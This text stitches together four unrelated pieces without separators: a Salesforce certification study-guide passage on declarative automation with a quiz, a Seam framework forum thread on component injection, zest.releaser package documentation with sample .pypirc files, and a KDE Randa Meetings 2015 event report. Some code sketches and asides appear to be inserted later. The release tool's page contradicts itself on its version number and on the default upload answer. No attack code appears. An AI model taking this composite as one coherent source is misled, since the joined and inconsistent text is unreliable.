In the evening the second event took place: the traditional Raclette dinner with our sponsors. Raclette, a traditional Swiss meal made of molten cheese, served with potatoes, gherkins and usually wine, was rather well received by both the participants and our sponsors. As last year, people, groups and companies that had helped with monetary or hardware donations received an invitation to spend an evening with us, eating said Raclette, drinking good local wine and getting to know the event they made possible. It was a lovely ending to a great and rather eventful day.

Saturday and Sunday - Pack your luggage

For most of the participants Saturday was the day to pack their luggage, prepare for departure and thus say good-bye, which was not easy after a very productive and creative week with good old and new friends - the KDE family. Sunday was then definitely the day for everybody to leave, as we needed to hand over the house at 11 am. So, with half of the participants already gone and the other half helping to clean and clear the house, the 6th edition of the Randa Meetings ended.

The future - See you again next year?

It was another very good and exhausting week in Randa. A lot was done, discussed and achieved, but people were tired and headed on their more or less long ways home. Organization- and administration-wise there is still some work left to wrap everything up, and then we can start to think about another edition of the KDE Tech Summit called "Randa Meetings". Will you be part of it, will you help again, will you read about it?...
If you would like to read even more about the Randa Meetings 2015 and also get some more personal views, a list of personal blog posts is available on our community wiki. Thanks to Gilles Caulier for the nice pictures. And for everybody who read the whole text, here is a little surprise: you might add yourself to the date selection for the Randa Meetings 2016 as one of the first.

Glad to read up on the progress. I hope Digikam 5.0 starts off as a stable port. A lot was invested in 4.x to make it stable. Also good to read about clean-ups in the KIPI Plugins. Thanks to all of you for making Digikam.

Hey people of KDE, this is just a big shout out to you guys and your wonderful work. The new Breeze theme and icons just look awesomazing; the overall very consistent theming creates a very professional look and feel - it's such a tremendous feeling to work with a beautiful desktop and an overall consistent experience. I'm an art teacher and I work with a Cintiq Companion 2 - so for me it's great news that you guys are focusing on touch integration (besides an already super desktop experience), and I really hope that you will integrate graphics tablets as input devices in the system settings and maybe even throw in an on-screen keyboard (especially for the login screen). I would love so much to go Linux/KDE full time, but these little missing features force me to use Windows way more than I like to. KRunner, DigiKam, Dolphin, Krita, Calligra, Kdenlive and many more - it is simply amazing what you guys have brought to the table of the open-source community. Thank you very much for your hard work and rock on! Greetings, David
https://dot.kde.org/2015/12/07/randa-meetings-2015-huge-success-again
- Working with Live Tiles Locally
- Rotating Live Tiles to keep interest
- Modifying Live Tiles in a Background Process (This Post)
- Using Azure and Push Notifications with Live Tiles

Continuous updating with background processes

In the previous posts we talked about best practices for what to put on live tiles and also how to use the TileUpdateManager to change the tiles. In this post and in Using Azure and Push Notifications with Live Tiles, we will discuss how to make changes to your live tiles when the user is not using your application. As we learned in the last post, rotating your tiles is a great way to keep visual interest in your application or game, but if the user is busy and does not have time to use your application for a week or two, the tiles that you updated will quickly become stale. Imagine a Sports, News, or Stocks application that has week-old data. Updating your tiles with a background trigger is one way to keep them fresh. We are going to use the same project we used for the last post. If you did not create it in the last post and want to follow along, you can create a new project and create a new WideLogo (see this post to find out how).

Creating Rotating Live Tiles from a Background Trigger

1. In the Solution Explorer, right click on the Solution (NOT Project) and select Add -> New Project

2. Select the Windows Runtime Component, name it TileBackground and click OK

3. The Class1.cs file from that project will open; for simplicity we will leave it named Class1 (you would want to rename this in a real project, of course)

4. At the top of the Class1.cs file, add the following using statements

using Windows.ApplicationModel.Background;
using Windows.Data.Xml.Dom;
using Windows.UI.Notifications;
using System.Net.Http;
using System.IO;

5. Next, have Class1 implement the IBackgroundTask interface and delete the thrown exception that is generated. When you are done, your class should look like the image below.

6.
Above the Run method, add the following declaration for the TileUpdater:

TileUpdater tileUpdater;

7. Underneath the Run method, add the AddTileNotification method. This is the same code we have used in the other posts - only now it is going to run in a background process.

private void AddTileNotification(string content, string tag)
{
    var templateType = TileTemplateType.TileWideSmallImageAndText04;
    var xml = TileUpdateManager.GetTemplateContent(templateType);

    var textNodes = xml.GetElementsByTagName("text");
    textNodes[0].AppendChild(xml.CreateTextNode("A message"));
    textNodes[1].AppendChild(xml.CreateTextNode(content));

    var imageNodes = xml.GetElementsByTagName("image");
    var elt = (XmlElement)imageNodes[0];
    elt.SetAttribute("src", "ms-appx:///_Images/Coffee03.jpg");

    var tile = new TileNotification(xml);
    tile.Tag = tag;
    //tile.ExpirationTime = DateTimeOffset.Now.Add(new TimeSpan(0, 0, 20));
    tileUpdater.Update(tile);
}

8. Now we want to add something a little different to our project. Since you would want to pull data from somewhere outside of your project, we will simulate this by pulling a random quote from the IHeartQuotes API to show on our tile. Add the two methods below to your class.
(These are the same ones we used previously with the Yahoo API. Since this post is about the tiles, we will not comment on the code below; we will do another post on calling REST APIs in the near future.)

private async void GetData()
{
    String _url = "";
    var _Result = await CallService(new Uri(_url));
    if (_Result != null)
        AddTileNotification(_Result.quote, "tag new");
}

private async Task<RootObject> CallService(Uri uri)
{
    string _JsonString = string.Empty;

    // fetch from rest service
    var _HttpClient = new System.Net.Http.HttpClient();
    try
    {
        HttpResponseMessage _HttpResponse = _HttpClient.GetAsync(uri.ToString()).Result;
        _HttpResponse.EnsureSuccessStatusCode();
        _JsonString = await _HttpResponse.Content.ReadAsStringAsync();
    }
    catch (Exception ex)
    {
        string test = ex.ToString();
    }

    // deserialize json to objects
    var _JsonBytes = Encoding.Unicode.GetBytes(_JsonString);
    using (MemoryStream _MemoryStream = new MemoryStream(_JsonBytes))
    {
        var _JsonSerializer = new DataContractJsonSerializer(typeof(RootObject));
        var _Result = (RootObject)_JsonSerializer.ReadObject(_MemoryStream);
        return _Result;
    }
}

9. Next, we want to add the code we want to run in the Run method. Add the following code INSIDE the Run(IBackgroundTaskInstance taskInstance) method.

BackgroundTaskDeferral deferral = taskInstance.GetDeferral();

tileUpdater = TileUpdateManager.CreateTileUpdaterForApplication();
tileUpdater.EnableNotificationQueue(true);

AddTileNotification("Hey Everyone... What's up", "tag1");
AddTileNotification("Come see the new coffee shops", "tag2");
AddTileNotification("I need caffeine", "tag3");
AddTileNotification("I drink coffee therefore I live", "tag4");
AddTileNotification("Caffeine drip please", "tag5");

GetData();

deferral.Complete();

10. Now all we have left is to add the class that the returned JSON will be deserialized into. We once again used json2csharp.com to create a class. Add the code BELOW Class1, inside the namespace brackets.
(We could have put this in a separate file but will do it this way for simplicity.)

public sealed class RootObject
{
    public string json_class { get; set; }
    public IList<string> tags { get; set; }
    public string quote { get; set; }
    public string link { get; set; }
    public string source { get; set; }
}

That completes the project that will run in the background when the trigger is fired.

Call your background trigger from your application

Now we are going to set up our project to allow background triggers and call the trigger from our project.

1. Right click on the References folder in your Windows 8 project and click on Add Reference.

2. When the Reference Manager comes up, select Solution and Projects on the left, click on the TileBackground project, and then click on OK

3. Now, double click on Package.appxmanifest in the Solution Explorer and open it to the Declarations tab

4. From the Available Declarations dropdown select Background Tasks

5. Click on Add

6. Under Properties (on this page) check the Timer task, and add the text TileBackground.Class1 to the Entry point section (this is the namespace and class for our background process, which we just referenced)

7. Now click on the Application UI tab (it should have a red X next to it) and scroll down to the Notifications section.

8. Change the Lock screen notifications dropdown to Badge

9. Change the Badge logo to Assets\<TheNameOfYourLogo>.png. YOU WILL NEED TO CREATE THIS IMAGE. Please see this post on how to modify an image. The image size will need to be 24 x 24. The name of your logo may be different; obviously change this to what you named your logo.

10. Open up App.xaml.cs (from the Solution Explorer) and add the following using statement to the top of the file.

using Windows.ApplicationModel.Background;

SPECIAL NOTE: We are placing this in the App.xaml.cs file for simplicity. This may or may not be where you want to launch your background task. Other options are the OnNavigatedTo method of your first page.

11.
Now add the RegisterBackgroundTasks() method to the class. This calls the BackgroundTaskBuilder and registers our trigger with the OS.

private void RegisterBackgroundTasks()
{
    BackgroundTaskBuilder builder = new BackgroundTaskBuilder();

    // Friendly string name identifying the background task
    builder.Name = "BackgroundLiveTiles";
    // Class name
    builder.TaskEntryPoint = "TileBackground.Class1";

    IBackgroundTrigger trigger = new TimeTrigger(15, true);
    builder.SetTrigger(trigger);

    IBackgroundCondition condition = new SystemCondition(SystemConditionType.InternetAvailable);
    builder.AddCondition(condition);

    IBackgroundTaskRegistration task = builder.Register();

    // You have the option of implementing these events to do something upon completion
    //task.Progress += task_Progress;
    //task.Completed += task_Completed;
}

NOTE: Make sure you named your project and class with the same case sensitivity as instructed, TileBackground.Class1; if you did not, you will need to change it in the code above. Since it is just a string, you will NOT get an error here.

12. Finally, make a call to the RegisterBackgroundTasks() method inside the OnLaunched() method as shown below.

That is all that is needed to set up our trigger to change our live tile in the background while we are not running.

How to run your background trigger during debug

Now we are going to show you how you can get your trigger to run while you are debugging your application.

1. Build and run the project

2. While the project is still running, switch back to Visual Studio

3. From the Suspend dropdown menu (if you set everything up correctly) you will see your background process trigger. Select it and it will fire your trigger. If you don't see this toolbar, in Visual Studio go to View -> Toolbars and make sure Debug and Debug Location are checked.

4. If you now look at your tile on the start page, it should show you rotating quotes, including one from the quotes service, as below.
(Quotes will vary.)

That's it for this post; in the next post we will show you how to use Azure and push notifications to accomplish the same thing.

Happy Programming

Daniel Egan - The Sociable Geek
https://thesociablegeek.com/category/windows-8/livetiles/
Java For Dummies, 8th Edition

An int value inside a switch statement works in any version of Java, old or new. (For that matter, char values and a few other kinds of values have worked in Java's switch statements ever since Java was a brand-new language.) Starting with Java 7, you can set it up so that the case to be executed in a switch statement depends on the value of a particular string. The code below illustrates the use of strings in switch statements.

import static java.lang.System.out;

import java.util.Scanner;

public class SwitchIt7 {

    public static void main(String args[]) {
        Scanner keyboard = new Scanner(System.in);
        out.print("Which verse (one, two or three)? ");
        String verse = keyboard.next();

        switch (verse) {
        case "one":
            out.println("That's because he has no brain.");
            break;
        case "two":
            out.println("That's because he is a pain.");
            break;
        case "three":
            out.println("'Cause this is the last refrain.");
            break;
        default:
            out.println("No such verse. Please try again.");
            break;
        }

        out.println("Ohhhhhhhh… .");
        keyboard.close();
    }
}

Get some practice with if statements and switch statements! Write a program that inputs the name of a month and outputs the number of days in that month. In this first version of the program, assume that February always has 28 days.

Make your code even better! Have the user input a month name, but also have the user input yes or no in response to the question Is it a leap year?
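As a starting point for the first exercise, here is one possible solution sketch. The class and method names are my own, not the book's, and February is fixed at 28 days, as the first version of the exercise asks:

```java
public class MonthDays {

    // Returns the number of days in the named month, or -1 for an
    // unknown month name. February is fixed at 28 days for now.
    public static int daysInMonth(String month) {
        switch (month.toLowerCase()) {
        case "january":
        case "march":
        case "may":
        case "july":
        case "august":
        case "october":
        case "december":
            return 31;
        case "april":
        case "june":
        case "september":
        case "november":
            return 30;
        case "february":
            return 28;
        default:
            return -1;
        }
    }

    public static void main(String args[]) {
        System.out.println("June has " + daysInMonth("June") + " days");
        System.out.println("February has " + daysInMonth("February") + " days");
    }
}
```

Notice how several case labels fall through to one return statement — that is the idiomatic way to group months with the same length. For the "make your code even better" part, you would add a boolean leap-year parameter and return 29 for February when it is true.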
https://www.dummies.com/article/technology/programming-web-design/java/use-strings-java-switch-statement-239328/
tgamma, tgammaf, tgammal - true gamma function

#include <math.h>

double tgamma(double x);
float tgammaf(float x);
long double tgammal(long double x);

These functions calculate the Gamma function of x. The Gamma function is defined by

    Gamma(x) = integral from 0 to infinity of t^(x−1) e^−t dt

It has the property

    Gamma(x+1) = x * Gamma(x)

Furthermore, the following holds for all values of x outside the poles:

    Gamma(x) * Gamma(1 − x) = PI / sin(PI * x)

RETURN VALUE
On success, these functions return the Gamma function of x. If x is −0 or +0, a pole error occurs, and the functions return HUGE_VAL, HUGE_VALF, or HUGE_VALL, respectively, with the same sign as the 0.

ERRORS
See math_error(7) for information on how to determine whether an error has occurred when calling these functions. The following errors can occur:

Domain error: x is a negative integer, or negative infinity
    errno is set to EDOM. An invalid floating-point exception (FE_INVALID) is raised (but see BUGS).

Pole error: x is +0 or −0
    errno is set to ERANGE. A divide-by-zero floating-point exception (FE_DIVBYZERO) is raised.

Range error: result overflow
    errno is set to ERANGE. An overflow floating-point exception (FE_OVERFLOW) is raised.

glibc also gives the following error which is not specified in C99 or POSIX.1-2001.

Range error: result underflow
    An underflow floating-point exception (FE_UNDERFLOW) is raised, and errno is set to ERANGE.

For an explanation of the terms used in this section, see attributes(7).

NOTES
This function had to be called "true gamma function" since there is already a function gamma(3) that returns something else (see gamma(3) for details).

BUGS
Before version 2.18, the glibc implementation of these functions did not set errno to EDOM when x is negative infinity.

Before glibc 2.19, the glibc implementation of these functions did not set errno to ERANGE on an underflow range error.

In glibc versions 2.3.3 and earlier, an argument of +0 or −0 incorrectly produced a domain error (errno set to EDOM and an FE_INVALID exception raised), rather than a pole error.
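Although the man page describes the C functions, the same Gamma function is exposed in Python as math.gamma(), which makes it easy to sanity-check the identities above numerically (Python is used here purely for convenience; it exercises the same mathematics, not glibc's tgamma directly):

```python
import math

# Gamma(n+1) = n! for nonnegative integers n
for n in range(1, 10):
    assert math.isclose(math.gamma(n + 1), math.factorial(n))

# Recurrence: Gamma(x+1) = x * Gamma(x)
for x in [0.5, 1.7, 3.25, 9.9]:
    assert math.isclose(math.gamma(x + 1), x * math.gamma(x))

# Reflection formula: Gamma(x) * Gamma(1 - x) = pi / sin(pi * x)
for x in [0.3, 0.5, 1.25]:
    assert math.isclose(math.gamma(x) * math.gamma(1 - x),
                        math.pi / math.sin(math.pi * x))

print("all identities hold")
```

Note that, just like tgamma(3), math.gamma() raises an error for the poles at nonpositive integers.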
http://manpages.courier-mta.org/htmlman3/tgamma.3.html
how to make a simple password lock in c++?? i want a alphabetic lock btw thanks for helping

Can you please clarify? You want to have a prompt such as: "Enter the password: " and then check if the password that is entered is correct? Depending on the security level needed, you could just hardcode the password in the code and do a string comparison. Another common feature would be to "mask" the password that is entered (with *'s perhaps), but I don't know how to go about that.

Dave

I think it's impossible to replace typed letters/numbers with a '*' in C++; however, you could get keyboard input directly with kbhit(). To use the function kbhit() you need to include the C header 'conio.h'.

#include <conio.h>

For example:

char example[10];
if (kbhit() == TRUE)
{
    example[0] = getchar();
}
https://www.daniweb.com/programming/software-development/threads/298596/how-to-make-a-simple-password-lock-in-c
- Step 4 Seek sponsorship. Talk about what you would like from your sponsors (supplies, money, discounts, etc.) and explain to them what you will be doing in return (patronage, advertising, image). Be realistic and don't expect too much.
- Step 5 Find a home field. (See "How to Find a Paintball Field.") It should be somewhere local where you all like to play. Talk with the owner and see how he feels about your team calling his field "home." Offer to help referee and clean up in exchange for discounts or use of a practice field.
- Step 6 Play together as a team as much as possible, focusing on tactics and strategy. Talk before and after each game about what went right and wrong.
- Step 7 Enter a tournament and represent your sponsors well by displaying good sportsmanship whether you win or lose.

Anonymous said on 7/25/2006: It is best to practice at a field you play at often. Not only do random players come in and test your skill against new opponents, you also build a bond with the field owner, which could lead to partial sponsorships down the road.
http://www.ehow.com/how_7319_start-paintball-team.html
#include <presence.h>

Inherits Stanza.

Inheritance diagram for Presence:

Definition at line 32 of file presence.h.

Describes the different valid presence types.
Definition at line 42 of file presence.h.

Creates a Presence request.
Definition at line 73 of file presence.cpp.

[virtual] Destructor.
Definition at line 82 of file presence.cpp.

[inline] Adds a (possibly translated) status message.
Definition at line 117 of file presence.h.

A convenience function returning the stanza's Capabilities, if any. May be 0.
Definition at line 104 of file presence.cpp.

Returns the presence's type.
Definition at line 89 of file presence.h.

Returns the presence priority in the legal range: -128 to +127.
Definition at line 131 of file presence.h.

Resets the default status message as well as all language-specific ones.
Definition at line 87 of file presence.cpp.

Sets the presence type.
Definition at line 95 of file presence.h.

Sets the priority. Legal range: -128 to +127.
Definition at line 94 of file presence.cpp.

Returns the status text of a presence stanza for the given language if available. If the requested language is not available, the default status text (without a xml:lang attribute) will be returned.
Definition at line 106 of file presence.h.

Definition at line 76 of file presence.h.

Creates a Tag representation of the Stanza. The Tag is completely independent of the Stanza and will not be updated when the Stanza is modified.
Implements Stanza.
Definition at line 109 of file presence.cpp.
http://camaya.net/api/gloox-trunk/classgloox_1_1Presence.html
on-stack replacement in v8

A recent post looked at what V8 does with a simple loop:

function g () { return 1; }

function f () {
  var ret = 0;
  for (var i = 1; i < 10000000; i++) {
    ret += g ();
  }
  return ret;
}

It turns out that calling f actually inlines g into the body, at runtime. But how does V8 do that, and what was the dead code about? V8 hacker Kasper Lund kindly chimed in with an explanation, which led me to write this post.

When V8 compiled an optimized version of f with g, it decided to do so when f was already in the loop. It needed to stop the loop in order to replace the slow version with the fast version. The mechanism that it uses is to reset the stack limit, causing the overflow handler in g to be called. So the computation is stuck in a call to g, and somehow must be transformed to a call to a combined f+g. The actual mechanics are a bit complicated, so I'm going to try a picture. Here we go:

As you can see, V8 replaces the top of the current call stack with one in which the frames have been merged together. This is called on-stack replacement (OSR). OSR takes the contexts of some contiguous range of function applications and the variables that are live in those activations, and transforms those inputs into a new context or contexts and live variable set, and splats the new activations on the stack. I'm using weasel words here because OSR can go both ways: optimizing (in which N frames are combined to 1) and deoptimizing (typically the other way around), as Hölzle notes in "Optimizing Dynamically-Dispatched Calls with Run-Time Type Feedback". More on deoptimization some other day, perhaps.

The diagram above mentions "loop restart entry points", which is indeed the "dead code" that I mentioned previously. That code forms part of an alternate entry point to the function, used only once, when the computation is restarted after on-stack replacement.
details, godly or otherwise

Given what I know now about OSR, I'm going to try an alternate decompilation of V8's f+g optimized function. This time I am going to abuse C as a high-level assembler. (I know, I know. Play along with me :))

Let us start by defining our types.

typedef union { uint64_t bits; } Value;

typedef struct { Value map; uint64_t data[]; } Object;

All JavaScript values are of type Value. Some Values encode small integers (SMIs), and others encode pointers to Object. Here I'm going to assume we are on a 64-bit system. The data member of Object is a tail array of slots.

inline bool val_is_smi (Value v)
{ return !(v.bits & 0x1); }

inline Value val_from_smi (int32_t i)
{ return (Value) { ((uint64_t)i) << 32 }; }

inline int32_t val_to_smi (Value v)
{ return v.bits >> 32; }

Small integers have 0 as their least significant bit, and the payload in the upper 32 bits. Did you see the union literal syntax here? (Value){ ((uint64_t)i) << 32 }? It's a C99 thing that most folks don't know about. Anyway.

inline bool val_is_obj (Value v)
{ return !val_is_smi (v); }

inline Value val_from_obj (Object *p)
{ return (Value) { ((uint64_t)p) + 1U }; }

inline Object* val_to_obj (Value v)
{ return (Object*) (v.bits - 1U); }

Values that are Object pointers have 01 as their least significant bits. We have to mask off those bits to get the pointer to Object. Numbers that are not small integers are stored as Object values, on the heap. All Object values have a map field, which points to a special object that describes the value: what type it is, how its fields are laid out, etc. Much like GOOPS, actually, though not as reflective. In V8, the double value will be the only slot in a heap number. Therefore to access the double value of a heap number, we simply check whether the Object's map is the heap number map, and in that case return the first slot, as a double. There is a complication though; what is the value of the heap number map?
V8 actually doesn't encode it into the compiled function directly. I'm not sure why it doesn't. Instead it stores the heap number map in a slot in the root object, and stores a pointer into the middle of the root object in r13. It's as if we had a global variable like this:

Value *root; // r13

const int STACK_LIMIT_IDX = 0;
const int HEAP_NUMBER_MAP_IDX = -7; // Really.

inline bool obj_is_double (Object* o)
{ return o->map.bits == root[HEAP_NUMBER_MAP_IDX].bits; }

Indeed, the offset into the root pointer is negative, which is a bit odd. But hey, details! Let's add the functions to actually get a double from an object:

union cvt { double d; uint64_t u; };

inline double obj_to_double (Object* o)
{ return ((union cvt) { .u = o->data[0] }).d; }

inline Object* double_to_obj (double d)
{
  Object *ret = malloc (sizeof (Value) * 2);
  ret->map = root[HEAP_NUMBER_MAP_IDX];
  ret->data[0] = ((union cvt) { .d = d }).u;
  return ret;
}

I'm including double_to_obj here just for completeness. Also did you enjoy the union literals in this block?

So, we're getting there. Perhaps the reader recalls, but V8's calling convention specifies that the context and the function are passed in registers. Let's model that in this silly code with some global variables:

Value context; // rsi
Value function; // rdi

Recall also that when f+g is called, it needs to check that g is actually bound to the same value. So here we go:

const Value* g_cell;
const Value expected_g = (Value) { 0x7f7b205d7ba1U };

Finally, f+g. I'm going to show the main path all in one go. Take a big breath!

Value f_and_g (Value receiver)
{
  // Stack slots (5 of them)
  Value osr_receiver, osr_unused, osr_i, osr_ret, arg_context;
  // Dedicated registers
  register int64_t i, ret;

  arg_context = context;

  // Assuming the stack grows down.
  if ((uint64_t) &arg_context > root[STACK_LIMIT_IDX].bits)
    // The overflow handler knows how to inspect the stack.
    // It can longjmp(), or do other things.
    handle_overflow ();

  i = 0;
  ret = 0;

 restart_after_osr:
  if (g_cell->bits != expected_g.bits)
    goto deoptimize_1;

  while (i < 10000000)
    {
      register uint64_t tmp = ret + 1;
      if ((int64_t)tmp < 0)
        goto deoptimize_2;
      i++;
      ret = tmp;
    }

  return val_from_smi (ret);

And exhale. The receiver object is passed as an argument. There are five stack slots, none of which are really used in the main path. Two locals are allocated in registers: i and ret, as we mentioned before. There's the stack check, locals initialization, the check for g, and then the loop, and the return. The test in the loop is intended to be a jump-on-overflow check.

restart_after_osr what?

But what about OSR, and what's that label about? What happens is that when f+g is replaced on the stack, the computation needs to restart. It does so from the osr_after_inlining_g label:

 osr_after_inlining_g:
  if (val_is_smi (osr_i))
    i = val_to_smi (osr_i);
  else
    {
      if (!obj_is_double (val_to_obj (osr_i)))
        goto deoptimize_3;

      double d = obj_to_double (val_to_obj (osr_i));

      i = (int64_t)trunc (d);
      if ((double) i != d || isnan (d))
        goto deoptimize_3;
    }

Here we take the value for the loop counter, as stored on the stack by OSR, and unpack it so that it is stored in the right register. Unpacking a SMI into an integer register is simple. On the other hand unpacking a heap number has to check that the number has an integer value. I tried to represent that here with the C code. The actual assembly is just as hairy but a bit more compact; see the article for the full assembly listing.
The same thing happens for the other value that was live at OSR time, ret:

  if (val_is_smi (osr_ret))
    ret = val_to_smi (osr_ret);
  else
    {
      if (!obj_is_double (val_to_obj (osr_ret)))
        goto deoptimize_4;

      double d = obj_to_double (val_to_obj (osr_ret));

      ret = (int64_t)trunc (d);
      if ((double) ret != d || isnan (d))
        goto deoptimize_4;

      if (ret == 0 && signbit (d))
        goto deoptimize_4;
    }

  goto restart_after_osr;

Here we see the same thing, except that additionally there is a check for -0.0 at the end, because V8 could not prove to itself that ret would not be -0.0. But if all succeeded, we jump back to the restart_after_osr case, and the loop proceeds.

Finally we can imagine some deoptimization bailouts, which would result in OSR, but for deoptimization instead of optimization. They are implemented as tail calls (jumps), so we can't represent them properly in C.

 deoptimize_1:
  return deopt_1 ();
 deoptimize_2:
  return deopt_2 ();
 deoptimize_3:
  return deopt_3 ();
 deoptimize_4:
  return deopt_4 ();
}

and that's that. I think I've gnawed all the meat that's to be had off of this bone, so hopefully that's the last we'll see of this silly loop. Comments and corrections very much welcome. Next up will probably be a discussion of how V8's optimizer works. Happy hacking.
http://www.advogato.org/person/wingo/diary.html?start=366
LinkWell

LinkWell is a Text plugin that detects URLs and emails in a String and, when they are tapped, opens them in the user's browser.

ScreenShots

Usage

Basic:

import 'package:linkwell/linkwell.dart';

LinkWell(
    "Hi here's my email: samuelezedi@gmail.com and website:"
);

Add Styling

To add style to links:

LinkWell(
    "Hi here's my email: samuelezedi@gmail.com and website:",
    linkStyle: TextStyle(color: Colors.blue, fontSize: 17)
);

To add style to non-links:

LinkWell(
    "Hi here's my email: samuelezedi@gmail.com and website:",
    style: TextStyle(color: Colors.black, fontSize: 17)
);

Naming Links

If you would like to name the links:

LinkWell(
    "By registering you agree to our samuelezedi.com/terms and samuelezedi.com/privacy",
    listOfNames: {
        'samuelezedi.com/terms': 'Terms',
        'samuelezedi.com/privacy': 'Privacy Policy'
    },
);

Why I made this plugin

I was building a chat application and I needed to detect when users posted links and emails, so I went online and found a couple of plugins, but only one fit the need. I imported it and discovered that it could not detect emails and long URLs correctly, and I could not name URLs or emails. So I built LinkWell. I hope this is what you are looking for and that it solves your link problems. Kindly follow me on

I invite you to clone, star and make contributions to this project. Thanks.

Copyright 2020. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
https://pub.dev/documentation/linkwell_mirror/latest/
In this article, we'll show you how to get started with Domino in less than 10 minutes! We'll use some data about the demographics of New York City. Step 1 Download this CSV file and this Python script, mean_pop.py, which calculates mean statistics for whatever column you choose in the CSV file. Step 2 Next, create a new project and upload these files to Domino. Step 3 Now that you have these files in Domino, go to the "Runs" tab and start a new run using mean_pop.py. Use the command-line argument "PERCENT FEMALE" to calculate the mean value for that column. mean_pop.py "PERCENT FEMALE" The result is an average of 24% female in each zipcode. That's unexpectedly low, so let's dig deeper in an interactive Jupyter session. Step 4 Copy/paste these lines of code to follow along with the video below: import pandas as pd df = pd.read_csv('Demographic_Statistics_By_Zip_Code.csv') df[['COUNT FEMALE']].mean() df[['COUNT MALE']].mean() This says that on average they sampled 7 women and 10 men in each zipcode. That's a pretty small sample relative to the size of New York City, so we can't trust the 24% women we found in step 3. We need to find a different data set. Don't forget to name and save your Jupyter session! When you hit "Stop", we'll sync the results back to Domino. Then it's back to the drawing board to find a decent data set. Ahh ... the life of a data scientist! Step 5 You can review the results in the Runs dashboard, and even leave a comment to remind your future self why you didn't use this data set.
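The post never shows the contents of mean_pop.py, but based on how it is invoked in Step 3, a minimal stand-in might look like this. The CSV filename and column name come from the steps above; everything else is an assumption, and the actual script may differ:

```python
import csv
import sys

def mean_of_column(rows, column):
    """Average the numeric values found in `column`, skipping blank cells."""
    values = [float(row[column]) for row in rows
              if row.get(column) not in ("", None)]
    return sum(values) / len(values)

# Invoked as: python mean_pop.py "PERCENT FEMALE"
if __name__ == "__main__" and len(sys.argv) > 1:
    column = sys.argv[1]
    with open("Demographic_Statistics_By_Zip_Code.csv", newline="") as f:
        rows = list(csv.DictReader(f))
    print("Mean of %s: %.2f" % (column, mean_of_column(rows, column)))
```

Taking the column name from the command line is what lets Step 3 pass "PERCENT FEMALE" as an argument and reuse the same script for any column in the file.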
https://support.dominodatalab.com/hc/en-us/articles/360000102283-Domino-the-first-10-minutes
CC-MAIN-2018-26
refinedweb
289
74.79
Investors considering a purchase of Cognex Corp. (Symbol: CGNX) stock, but tentative about paying the going market price of $33.77/share, might benefit from considering selling puts among the alternative strategies at their disposal. One interesting put contract in particular is the May 2016 put at the $30 strike, which has a bid at the time of this writing of $2.05. Collecting that bid as the premium represents a 6.8% return against the $30 commitment, or a 10.4% annualized rate of return (at Stock Options Channel we call this the YieldBoost). Selling a put does not give an investor access to CGNX's upside potential the way owning shares would, because the put seller only ends up owning shares in the scenario where the contract is exercised. So unless Cognex Corp. sees its shares fall 11.2% and the contract is exercised (resulting in a cost basis of $27.95 per share before broker commissions, subtracting the $2.05 from $30), the only upside to the put seller is from collecting that premium for the 10.4% annualized rate of return. Interestingly, that annualized 10.4% figure actually exceeds the 0.8% annualized dividend paid by Cognex Corp. by 9.6%, based on the current share price of $33.77. And yet, if an investor were to buy the stock at the going market price in order to collect the dividend, there is greater downside because the stock would have to lose 11.19% to reach the $30 strike price. Always important when discussing dividends is the fact that, in general, dividend amounts are not always predictable and tend to follow the ups and downs of profitability at each company. In the case of Cognex Corp., looking at the dividend history chart for CGNX below can help in judging whether the most recent dividend is likely to continue, and in turn whether it is a reasonable expectation to expect a 0.8% annualized dividend yield.
Below is a chart showing the trailing twelve month trading history for Cognex Corp., and highlighting in green where the $30 strike is located relative to that history: The chart above, and the stock's historical volatility, can be a helpful guide in combination with fundamental analysis to judge whether selling the May 2016 put at the $30 strike for the 10.4% annualized rate of return represents good reward for the risks. We calculate the trailing twelve month volatility for Cognex Corp. (considering the last 252 trading day closing values as well as today's price of $33.77) to be 39%. For other put options contract ideas at the various different available expirations, visit the CGNX Stock Options page of StockOptionsChannel.com. In mid-afternoon trading on Thursday, the put volume among S&P 500 components was 1.00M contracts, with call volume at 954,458, for a put:call ratio of 1.05.
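The article's figures can be checked with a few lines of arithmetic; the days-to-expiration value is an assumption, since the exact May 2016 expiration date isn't stated:

```python
bid = 2.05          # premium collected per share
strike = 30.0
share_price = 33.77
days_to_exp = 239   # assumed: roughly 2015-09-24 to a May 2016 expiration

simple_return = bid / strike                     # return against the $30 commitment
annualized = simple_return * 365 / days_to_exp   # the "YieldBoost"
cost_basis = strike - bid                        # per-share cost if exercised
drop_to_strike = 1 - strike / share_price        # decline needed to reach the strike

print(f"{simple_return:.1%} {annualized:.1%} ${cost_basis:.2f} {drop_to_strike:.1%}")
# 6.8% 10.4% $27.95 11.2%
```

The simple return and cost basis match the article exactly; the annualized figure matches only under the assumed day count.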
https://www.nasdaq.com/articles/commit-buy-cognex-corp-30-earn-104-annualized-using-options-2015-09-24
CC-MAIN-2021-49
refinedweb
458
66.23
Hook and simulate keyboard events on Windows and Linux Project description Take full control of your keyboard with this small Python library. Hook global events, register hotkeys, simulate key presses and much more. - Global event hook (captures keys regardless of focus). - Simulates key presses. - Complex hotkey support (e.g. Ctrl+Shift+A followed by Alt+Space) with controllable timeout. - Maps keys as they actually are in your layout, with full internationalization support (‘Ctrl+ç’). - Events automatically captured in separate thread, doesn’t block main program. - Pure Python, no C modules to be compiled. - Zero dependencies. Trivial to install and deploy. - Works with Windows and Linux (if you have a Mac, pull requests are welcome). - Python 2 and Python 3. - Tested and documented. - Doesn’t break accented dead keys (I’m looking at you, pyHook) - Mouse support coming soon. Example: import keyboard # Press PAGE UP then PAGE DOWN to type "foobar". keyboard.add_hotkey('page up, page down', lambda: keyboard.write('foobar')) # Blocks until you press esc. keyboard.wait('esc') This program makes no attempt to hide itself, so don’t use it for keyloggers.
https://pypi.org/project/keyboard/0.6.5/
CC-MAIN-2020-10
refinedweb
209
61.63
